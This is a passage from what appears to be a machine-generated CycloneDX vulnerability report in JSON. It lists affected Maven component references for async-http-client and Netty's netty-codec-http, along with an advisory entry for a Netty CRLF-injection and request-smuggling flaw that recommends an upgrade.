        },
        {
          "ref": "pkg:maven/org.asynchttpclient/async-http-client@2.12.4",
          "versions": [
            {
              "version": "2.12.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3195e522-24fa-4f14-ba07-8f6326119b61"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3195e522-24fa-4f14-ba07-8f6326119b61"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3195e522-24fa-4f14-ba07-8f6326119b61"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3195e522-24fa-4f14-ba07-8f6326119b61"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1c8f2816-915c-4987-ae46-325c1d1f384d"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1c8f2816-915c-4987-ae46-325c1d1f384d"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1c8f2816-915c-4987-ae46-325c1d1f384d"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1c8f2816-915c-4987-ae46-325c1d1f384d"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#a687cfb7-0850-41c6-aedd-3fdc8bad0f1f"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#a687cfb7-0850-41c6-aedd-3fdc8bad0f1f"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#a687cfb7-0850-41c6-aedd-3fdc8bad0f1f"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#a687cfb7-0850-41c6-aedd-3fdc8bad0f1f"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#d5b0765e-9e29-429f-aac3-9eff1bfca617"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#d5b0765e-9e29-429f-aac3-9eff1bfca617"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#d5b0765e-9e29-429f-aac3-9eff1bfca617"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#d5b0765e-9e29-429f-aac3-9eff1bfca617"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#73c58f92-3263-4114-b905-b3e6b42a0b25"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#73c58f92-3263-4114-b905-b3e6b42a0b25"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#73c58f92-3263-4114-b905-b3e6b42a0b25"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#73c58f92-3263-4114-b905-b3e6b42a0b25"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#2e1757e6-3d07-4a97-9131-3423e91cf675"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#2e1757e6-3d07-4a97-9131-3423e91cf675"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#2e1757e6-3d07-4a97-9131-3423e91cf675"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#2e1757e6-3d07-4a97-9131-3423e91cf675"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#3af578c5-8fe3-4229-9e88-12389b2035dd"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#3af578c5-8fe3-4229-9e88-12389b2035dd"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#3af578c5-8fe3-4229-9e88-12389b2035dd"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#3af578c5-8fe3-4229-9e88-12389b2035dd"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#3a707eec-39a1-47cd-bbd2-11b85da8e7bb"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#3a707eec-39a1-47cd-bbd2-11b85da8e7bb"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#3a707eec-39a1-47cd-bbd2-11b85da8e7bb"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#3a707eec-39a1-47cd-bbd2-11b85da8e7bb"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.asynchttpclient/async-http-client@2.12.4"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#31bc5d27-49ef-4869-8402-0da39c3a19ec"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#31bc5d27-49ef-4869-8402-0da39c3a19ec"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#31bc5d27-49ef-4869-8402-0da39c3a19ec"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#31bc5d27-49ef-4869-8402-0da39c3a19ec"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#34ef48b1-3677-4fcb-b2c6-dbdf78f43999"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#34ef48b1-3677-4fcb-b2c6-dbdf78f43999"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#34ef48b1-3677-4fcb-b2c6-dbdf78f43999"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#34ef48b1-3677-4fcb-b2c6-dbdf78f43999"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#9bf476b5-795a-48ab-a6de-319640928d51"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#9bf476b5-795a-48ab-a6de-319640928d51"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#9bf476b5-795a-48ab-a6de-319640928d51"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#9bf476b5-795a-48ab-a6de-319640928d51"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-41417",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        93,
        444
      ],
      "description": "Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41417"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-v8h7-rr48-vmmv"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41417"
        }
      ],
      "published": "2026-05-06T22:16:25+00:00",
      "updated": "2026-05-11T14:29:48+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
